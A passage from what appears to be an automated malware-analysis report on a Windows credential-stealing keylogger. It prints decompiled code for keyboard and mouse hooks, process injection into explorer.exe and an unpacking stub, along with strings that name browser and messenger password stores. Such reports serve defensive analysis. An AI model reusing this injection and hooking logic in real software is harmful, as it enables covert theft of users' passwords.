					E00405D70(_v76, _t210, _t216,  *0x40f1ec, _t255, _t268);
				}
				goto L43;
			}
























































                                    0x0040bbf4
                                    0x0040bbf4
                                    0x0040bbf5
                                    0x0040bbf7
                                    0x0040bbfc
                                    0x0040bbfc
                                    0x0040bbfe
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc09
                                    0x0040bc10
                                    0x0040bc11
                                    0x0040bc16
                                    0x0040bc19
                                    0x0040bc25
                                    0x0040bc2a
                                    0x0040bc36
                                    0x0040bc4b
                                    0x0040bc38
                                    0x0040bc39
                                    0x0040bc43
                                    0x0040bc43
                                    0x0040bc59
                                    0x0040bc5e
                                    0x0040bc60
                                    0x0040bc65
                                    0x0040bc6a
                                    0x0040be9b
                                    0x0040bea9
                                    0x0040beae
                                    0x0040beb5
                                    0x0040beba
                                    0x0040bf06
                                    0x0040bf0b
                                    0x0040bf13
                                    0x0040bf1b
                                    0x0040bf20
                                    0x0040bf25
                                    0x0040bf2c
                                    0x0040bf2c
                                    0x0040bf31
                                    0x0040bf36
                                    0x0040bf3b
                                    0x0040bf40
                                    0x0040bf51
                                    0x0040bf56
                                    0x0040bf58
                                    0x0040bf5d
                                    0x0040bf62
                                    0x0040c02a
                                    0x0040bf68
                                    0x0040bf69
                                    0x0040bf73
                                    0x0040bf78
                                    0x0040bf8e
                                    0x0040bf90
                                    0x0040bf95
                                    0x0040bf9a
                                    0x0040c022
                                    0x0040bfa0
                                    0x0040bfa1
                                    0x0040bfab
                                    0x0040bfb0
                                    0x0040bfc6
                                    0x0040bfc8
                                    0x0040bfcd
                                    0x0040bfd2
                                    0x0040c01a
                                    0x0040bfd4
                                    0x0040bfd5
                                    0x0040bfdf
                                    0x0040bfe4
                                    0x0040bffa
                                    0x0040bffc
                                    0x0040c001
                                    0x0040c006
                                    0x0040c012
                                    0x0040c008
                                    0x0040c00a
                                    0x0040c00a
                                    0x0040c006
                                    0x0040bfd2
                                    0x0040bf9a
                                    0x0040c034
                                    0x0040c037
                                    0x0040c062
                                    0x0040c064
                                    0x0040c039
                                    0x0040c03e
                                    0x0040c049
                                    0x0040c056
                                    0x0040c056
                                    0x0040c06c
                                    0x0040c079
                                    0x0040c086
                                    0x0040c08b
                                    0x0040c090
                                    0x0040c093
                                    0x0040c095
                                    0x0040c09f
                                    0x0040c09f
                                    0x0040c0a4
                                    0x0040c0a9
                                    0x0040c0ab
                                    0x0040c0ae
                                    0x0040c0b1
                                    0x0040c0c3
                                    0x0040c0c3
                                    0x0040bebd
                                    0x0040bec4
                                    0x0040bed2
                                    0x0040bed9
                                    0x0040bee7
                                    0x0040bef3
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000

                                    APIs
                                    • GetLastError.KERNEL32(00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC2C
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC39
                                    • Sleep.KERNEL32(00002EE0,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC43
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC4B
                                      • Part of subcall function 00405D70: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                      • Part of subcall function 00405D70: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                      • Part of subcall function 00405D70: WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                      • Part of subcall function 00405D70: CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    • GetLastError.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC60
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC71
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BE9B
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEB0
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEBD
                                    • SetWindowsHookExA.USER32(0000000D,Function_0000B0B8,00400000,00000000), ref: 0040BED2
                                    • SetWindowsHookExA.USER32(0000000E,Function_0000B108,00400000,00000000), ref: 0040BEE7
                                      • Part of subcall function 0040BA84: GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                      • Part of subcall function 0040BA84: CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • ExitProcess.KERNEL32(00000000,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEFE
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF06
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF2C
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF58
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF69
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF73
                                    • GetLastError.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF90
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFA1
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFAB
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFC8
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFD5
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFDF
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFFC
                                    • ExitProcess.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C00A
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C012
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C01A
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C09F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$ErrorLast$Sleep$File$CreateExitHookProcessWindows$MutexPointerWrite
                                    • String ID: FIREFOX.abc$IEAUTO.abc$IELOGIN.abc$IEPASS.abc$IEWEB.abc$MSN.abc$NOIP.abc$Restart$XX--XX--XX.txt$_x_X_BLOCKMOUSE_X_x_$_x_X_PASSWORDLIST_X_x_$_x_X_UPDATE_X_x_
                                    • API String ID: 3001352634-1131808598
                                    • Opcode ID: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction ID: bdf70af56670c6b0a4a77e5acd908e49726916f33cb45a25643fdd496cb3d72a
                                    • Opcode Fuzzy Hash: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction Fuzzy Hash: 36C10130640244EADB10FBA6DC82B9D77689F45309F50453BF501BB2E2DB7CAE45CAAD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B3C0, Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 304processthreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E0040B3C0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				long _v8;
				char _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _t58;
				intOrPtr* _t60;
				intOrPtr* _t61;
				char* _t62;
				intOrPtr* _t71;
				intOrPtr _t91;
				intOrPtr* _t99;
				void* _t104;
				intOrPtr* _t113;
				intOrPtr* _t119;
				intOrPtr* _t124;
				intOrPtr _t129;
				intOrPtr* _t137;
				void* _t142;
				intOrPtr* _t151;
				intOrPtr _t159;
				char* _t161;
				struct HWND__* _t163;
				void* _t168;
				intOrPtr _t197;
				intOrPtr _t201;
				intOrPtr _t210;
				intOrPtr _t221;
				void* _t236;
				void* _t239;
				void* _t241;

				_t234 = __edi;
				_t194 = __ecx;
				_t185 = __ebx;
				_push(__ebx);
				_push(__esi);
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_push(_t239);
				_push(0x40b7a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t239 + 0xffffff90;
				_t58 =  *0x40d1cc; // 0x40e924
				_t236 = E00401F9C(_t58);
				_t60 =  *0x40d210; // 0x40e8ec
				_t241 =  *_t60 - 2;
				if(_t241 != 0) {
					_t61 =  *0x40d210; // 0x40e8ec
					__eflags =  *_t61 - 1;
					if(__eflags != 0) {
						_t62 =  *0x40d1b8; // 0x40e8fc
						__eflags =  *_t62 - 1;
						if( *_t62 == 1) {
							__eflags = 0;
							E004013A4(0,  &_v116);
							E00401E94( *0x40f1e8, _v116);
							if(__eflags != 0) {
								_t194 = E00401F48( *0x40f1e8);
								__eflags = 0;
								E00405AD8(0, _t85, "open", 0, 0x40b7f0, 0x40b7f0);
								E0040AFB0(__ebx, _t85, _t236, 0);
								ExitProcess(0);
							}
						}
						_t197 =  *0x40d21c; // 0x40e8f0
						__eflags = 0;
						E004013A4(0, _t197);
						E00403738();
						E00403738();
						_t71 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t71), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
					} else {
						E00406294( &_v112, __ebx, __edi, _t236, __eflags);
						_t91 =  *0x40d21c; // 0x40e8f0
						E00401B14(_t91, _v112);
						E00403738();
						E00403738();
						_t99 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t99), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						_t104 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
						__eflags = _t104;
						if(_t104 == 0) {
							_t210 =  *0x40d21c; // 0x40e8f0
							E004013A4(0, _t210);
							E00403738();
							E00403738();
							_t113 =  *0x40d21c; // 0x40e8f0
							CreateProcessA(E00401F48( *_t113), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
							E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
						}
					}
				} else {
					_t119 =  *0x40d21c; // 0x40e8f0
					E004047C4( *_t119, __ebx,  &_v100, __edi, _t236, _t241);
					E00401E94(_v100, "explorer.exe");
					if(_t241 != 0) {
						_t124 =  *0x40d21c; // 0x40e8f0
						__eflags = E004064DC( *_t124, __ebx,  &_v12, __edi, _t236, __eflags) - 1;
						if(__eflags != 0) {
							E00406294( &_v108, _t185, __edi, _t236, __eflags);
							_t129 =  *0x40d21c; // 0x40e8f0
							E00401B14(_t129, _v108);
						} else {
							E004063FC(_v12,  &_v104);
							_t159 =  *0x40d21c; // 0x40e8f0
							E00401B14(_t159, _v104);
						}
						E00403738();
						E00403738();
						_t137 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t137), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
					} else {
						_t161 =  *0x40d214; // 0x40e8f4
						if( *_t161 != 1) {
							_t163 = FindWindowA("shell_traywnd", 0); // executed
							GetWindowThreadProcessId(_t163,  &_v8);
							_t168 = E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t166, _t194, _t236, __edi, _t236); // executed
							__eflags = _t168;
							if(_t168 != 0) {
								_t142 = 1;
							} else {
								E00403738();
								E00403738();
								CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28); // executed
								_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236); // executed
							}
						} else {
							E00403738();
							E00403738();
							CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
							_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
						}
					}
					if(_t142 == 0) {
						_t221 =  *0x40d21c; // 0x40e8f0
						E004013A4(0, _t221);
						E00403738();
						E00403738();
						_t151 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t151), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
					}
				}
				_pop(_t201);
				 *[fs:eax] = _t201;
				_push(E0040B7AF);
				return E00401AE4( &_v116, 5);
			}






































                                    0x0040b3c0
                                    0x0040b3c0
                                    0x0040b3c0
                                    0x0040b3c6
                                    0x0040b3c7
                                    0x0040b3ca
                                    0x0040b3cd
                                    0x0040b3d0
                                    0x0040b3d3
                                    0x0040b3d6
                                    0x0040b3db
                                    0x0040b3dc
                                    0x0040b3e1
                                    0x0040b3e4
                                    0x0040b3e7
                                    0x0040b3f1
                                    0x0040b3f3
                                    0x0040b3f8
                                    0x0040b3fb
                                    0x0040b5fd
                                    0x0040b602
                                    0x0040b605
                                    0x0040b6dc
                                    0x0040b6e1
                                    0x0040b6e4
                                    0x0040b6e9
                                    0x0040b6eb
                                    0x0040b6f8
                                    0x0040b6fd
                                    0x0040b715
                                    0x0040b71c
                                    0x0040b71e
                                    0x0040b723
                                    0x0040b72a
                                    0x0040b72a
                                    0x0040b6fd
                                    0x0040b72f
                                    0x0040b735
                                    0x0040b737
                                    0x0040b744
                                    0x0040b751
                                    0x0040b76f
                                    0x0040b77c
                                    0x0040b788
                                    0x0040b60b
                                    0x0040b60e
                                    0x0040b616
                                    0x0040b61b
                                    0x0040b628
                                    0x0040b635
                                    0x0040b653
                                    0x0040b660
                                    0x0040b66c
                                    0x0040b671
                                    0x0040b673
                                    0x0040b679
                                    0x0040b681
                                    0x0040b68e
                                    0x0040b69b
                                    0x0040b6b9
                                    0x0040b6c6
                                    0x0040b6d2
                                    0x0040b6d2
                                    0x0040b673
                                    0x0040b401
                                    0x0040b404
                                    0x0040b40b
                                    0x0040b418
                                    0x0040b41d
                                    0x0040b502
                                    0x0040b50e
                                    0x0040b510
                                    0x0040b52f
                                    0x0040b537
                                    0x0040b53c
                                    0x0040b512
                                    0x0040b518
                                    0x0040b520
                                    0x0040b525
                                    0x0040b525
                                    0x0040b549
                                    0x0040b556
                                    0x0040b574
                                    0x0040b581
                                    0x0040b58d
                                    0x0040b423
                                    0x0040b423
                                    0x0040b42b
                                    0x0040b483
                                    0x0040b489
                                    0x0040b4a4
                                    0x0040b4a9
                                    0x0040b4ab
                                    0x0040b4f8
                                    0x0040b4ad
                                    0x0040b4b5
                                    0x0040b4c2
                                    0x0040b4e2
                                    0x0040b4ee
                                    0x0040b4ee
                                    0x0040b42d
                                    0x0040b435
                                    0x0040b442
                                    0x0040b462
                                    0x0040b46e
                                    0x0040b46e
                                    0x0040b42b
                                    0x0040b594
                                    0x0040b59a
                                    0x0040b5a2
                                    0x0040b5af
                                    0x0040b5bc
                                    0x0040b5da
                                    0x0040b5e7
                                    0x0040b5f3
                                    0x0040b5f3
                                    0x0040b594
                                    0x0040b78f
                                    0x0040b792
                                    0x0040b795
                                    0x0040b7a7

                                    APIs
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B462
                                      • Part of subcall function 004040F4: VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                      • Part of subcall function 004040F4: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                      • Part of subcall function 004040F4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                      • Part of subcall function 004040F4: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    • FindWindowA.USER32(shell_traywnd,00000000), ref: 0040B483
                                    • GetWindowThreadProcessId.USER32(00000000,shell_traywnd), ref: 0040B489
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,shell_traywnd,00000000,?,00000000,0040B7A8), ref: 0040B499
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,shell_traywnd,00000000), ref: 0040B4E2
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B581
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B5E7
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B660
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B6C6
                                      • Part of subcall function 004047C4: CharLowerA.USER32(?,00000000,00404839), ref: 00404802
                                    • ExitProcess.KERNEL32(00000000,00000000,0040B7A8), ref: 0040B72A
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B77C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Create$Virtual$AllocWindow$CharExitFindFreeLowerMemoryOpenThreadWrite
                                    • String ID: $@$explorer.exe$explorer.exe$open$shell_traywnd$@
                                    • API String ID: 3531647898-832551239
                                    • Opcode ID: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction ID: 1ef0f6496c909ed0c3779ef052ced8ab034a7c85da5a6e5c6a5d2eb73cd655db
                                    • Opcode Fuzzy Hash: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction Fuzzy Hash: 79B114B4B402086BD710EBE5CC42F9E77A9EB48704F50847BB600BB2D5D778E906979D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00455C10, Relevance: 7.7, APIs: 5, Instructions: 179librarymemoryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 83%
                                    			_entry_(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v128;
				void* _t64;
				void* _t65;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				signed int _t70;
				signed int _t71;
				unsigned int _t72;
				char _t82;
				signed char* _t84;
				long _t85;
				char* _t88;
				void* _t92;
				long _t93;
				void* _t95;
				void* _t98;
				intOrPtr* _t108;
				void* _t111;
				long _t112;
				char* _t123;
				intOrPtr* _t136;
				long _t140;
				intOrPtr* _t143;
				long _t147;
				intOrPtr* _t150;
				long _t154;
				struct HINSTANCE__* _t157;
				struct HINSTANCE__* _t160;
				signed int _t163;
				signed int _t255;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				char* _t271;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t281;
				void* _t282;
				void* _t283;
				intOrPtr* _t285;
				intOrPtr _t291;
				signed int _t316;
				unsigned int* _t317;
				CHAR* _t319;
				void* _t320;
				char* _t321;
				signed int _t322;
				unsigned int* _t323;
				signed int _t324;
				struct HINSTANCE__* _t325;
				unsigned int _t326;
				intOrPtr _t327;
				DWORD* _t328;
				intOrPtr _t329;
				void* _t330;
				signed int _t332;
				void* _t335;

				_t335 = __fp0;
				_t330 = __eflags;
				asm("pushad");
				_t322 = 0x412000;
				_t1 = _t322 - 0x11000; // 0x401000
				_t316 = _t1;
				_push(_t316);
				_t325 = _t324 | 0xffffffff;
				while(1) {
					_t259 =  *_t322;
					_t322 = _t322 - 0xfffffffc;
					asm("adc ebx, ebx");
					do {
						if(_t330 < 0) {
							_t64 =  *_t322;
							_t322 = _t322 + 1;
							 *_t316 = _t64;
							_t316 = _t316 + 1;
							__eflags = _t316;
							goto L47;
						}
						_t65 = 1;
						while(1) {
							_t260 = _t259 + _t259;
							if(_t260 == 0) {
								_t260 =  *_t322;
								_t322 = _t322 - 0xfffffffc;
								asm("adc ebx, ebx");
							}
							asm("adc eax, eax");
							_t261 = _t260 + _t260;
							_t332 = _t261;
							if(_t332 >= 0) {
								goto L56;
							}
							L54:
							if(_t332 != 0) {
								L62:
								_t272 = 0;
								_t66 = _t65 - 3;
								__eflags = _t66;
								if(_t66 < 0) {
									_t261 = _t261 + _t261;
									__eflags = _t261;
									if(__eflags == 0) {
										_t261 =  *_t322;
										_t322 = _t322 - 0xfffffffc;
										asm("adc ebx, ebx");
									}
									L67:
									if(__eflags < 0) {
										L59:
										_t259 = _t261 + _t261;
										__eflags = _t259;
										if(_t259 == 0) {
											_t259 =  *_t322;
											_t322 = _t322 - 0xfffffffc;
											asm("adc ebx, ebx");
										}
										asm("adc ecx, ecx");
										L77:
										__eflags = _t325 - 0xfffffb00;
										asm("adc ecx, 0x2");
										_t285 = _t325 + _t316;
										__eflags = _t325 - 0xfffffffc;
										if(_t325 <= 0xfffffffc) {
											do {
												_t67 =  *_t285;
												_t285 = _t285 + 4;
												 *_t316 = _t67;
												_t316 = _t316 + 4;
												_t272 = _t272 - 4;
												__eflags = _t272;
											} while (_t272 > 0);
											_t316 = _t316 + _t272;
											break;
										} else {
											goto L78;
										}
										do {
											L78:
											_t68 =  *_t285;
											_t285 = _t285 + 1;
											 *_t316 = _t68;
											_t316 = _t316 + 1;
											_t272 = _t272 - 1;
											__eflags = _t272;
										} while (_t272 != 0);
										break;
									}
									_t272 = _t272 + 1;
									_t261 = _t261 + _t261;
									__eflags = _t261;
									if(__eflags == 0) {
										_t261 =  *_t322;
										_t322 = _t322 - 0xfffffffc;
										asm("adc ebx, ebx");
									}
									if(__eflags < 0) {
										goto L59;
									} else {
										goto L71;
										do {
											do {
												L71:
												_t262 = _t261 + _t261;
												__eflags = _t262;
												if(_t262 == 0) {
													_t262 =  *_t322;
													_t322 = _t322 - 0xfffffffc;
													asm("adc ebx, ebx");
												}
												asm("adc ecx, ecx");
												_t261 = _t262 + _t262;
												__eflags = _t261;
											} while (__eflags >= 0);
											if(__eflags != 0) {
												break;
											}
											_t261 =  *_t322;
											_t322 = _t322 - 0xfffffffc;
											__eflags = _t322;
											asm("adc ebx, ebx");
										} while (_t322 >= 0);
										_t272 = _t272 + 2;
										__eflags = _t272;
										goto L77;
									}
								}
								_t70 =  *_t322;
								_t322 = _t322 + 1;
								_t71 = _t70 ^ 0xffffffff;
								__eflags = _t71;
								if(__eflags == 0) {
									_pop(_t323);
									_t317 = _t323;
									goto L83;
									do {
										do {
											L83:
											_t72 =  *_t317;
											_t317 =  &(_t317[0]);
											__eflags = _t72 - 0xe8 - 1;
										} while (_t72 - 0xe8 > 1);
										__eflags =  *_t317 - 1;
									} while ( *_t317 != 1);
									asm("rol eax, 0x10");
									 *_t317 = ( *_t317 >> 8) - _t317 + _t323;
									__eflags =  &(_t317[1]);
									asm("loop 0xffffffdb");
									_t50 =  &(_t323[0x13c00]); // 0x450000
									_t319 = _t50;
									while(1) {
										L86:
										_t82 =  *_t319;
										__eflags = _t82;
										if(_t82 == 0) {
											break;
										}
										_t51 =  &(_t319[4]); // 0xf1ec
										_t271 = _t323 +  *_t51;
										_t321 =  &(_t319[8]);
										__eflags = _t321;
										_t325 = LoadLibraryA( &(_t323[0x156c2]) + _t82);
										while(1) {
											_t319 =  &(_t321[1]);
											_t255 =  *_t321;
											__eflags = _t255;
											if(_t255 == 0) {
												goto L86;
											}
											asm("repne scasb");
											_t82 = GetProcAddress(_t325, _t319);
											__eflags = _t82;
											if(_t82 == 0) {
												ExitProcess();
											}
											 *_t271 = _t82;
											_t271 =  &(_t271[4]);
										}
									}
									_t326 = _t323[0x156f6];
									_t59 = _t323 - 0x1000; // 0x400000
									_t320 = _t59;
									VirtualProtect(_t320, 0x1000, 4, _t328);
									_t60 = _t320 + 0x21f; // 0x40021f
									_t84 = _t60;
									 *_t84 =  *_t84 & 0x0000007f;
									_t61 =  &(_t84[0x28]);
									 *_t61 = _t84[0x28] & 0x0000007f;
									__eflags =  *_t61;
									_t85 = _t82;
									_push(_t85);
									VirtualProtect(_t320, 0x1000, _t85, _t328); // executed
									asm("popad");
									_t88 =  &_v128;
									do {
										_push(0);
										__eflags = _t328 - _t88;
									} while (_t328 != _t88);
									_t329 = _t328 - 0xffffff80;
									_push(_t326);
									_t327 = _t329;
